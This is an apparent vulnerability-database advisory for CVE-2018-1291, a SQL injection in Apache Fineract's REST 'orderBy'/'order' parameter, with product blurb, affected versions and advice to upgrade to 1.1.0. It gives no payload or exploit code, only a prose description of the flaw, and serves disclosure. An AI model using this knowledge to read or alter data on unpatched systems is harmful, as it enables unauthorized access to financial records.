Authors:Still in Risk：Critical CVE：CVE-2018-1291 0day:SQL Injection 0day -id:0DAY-176115 Date：2018-04-29
Apache Fineract exposes different REST end points to query domain specific
entities with a Query Parameter ‘orderBy’ which are appended directly with SQL statements. A hacker/user can inject/draft
the ‘orderBy’ query parameter by way of the “order” param in such a way
to to read/update the data for which he doesn’t have authorization.
Apache Fineract can be deployed in any environment: cloud or on-premise, on or offline, mobile or PC; it’s extensible enough to support any organizational type or delivery channel, and flexible enough to support any product, service, or methodology. For any organization, big or small, it will provide the client data management, loan and savings portfolio management, integrated real time accounting, and social and financial reporting needed to bring digital financial services in a modern connected world.financial institutions, and service providers to offer financial services to the world’s 2 billion underbanked and unbanked.
The Apache Software Foundation
All users should migrate to Apache Fineract 1.1.0 version
Apache Fineract 1.0.0 Apache Fineract 0.6.0-incubating Apache Fineract 0.5.0-incubating Apache Fineract 0.4.0-incubating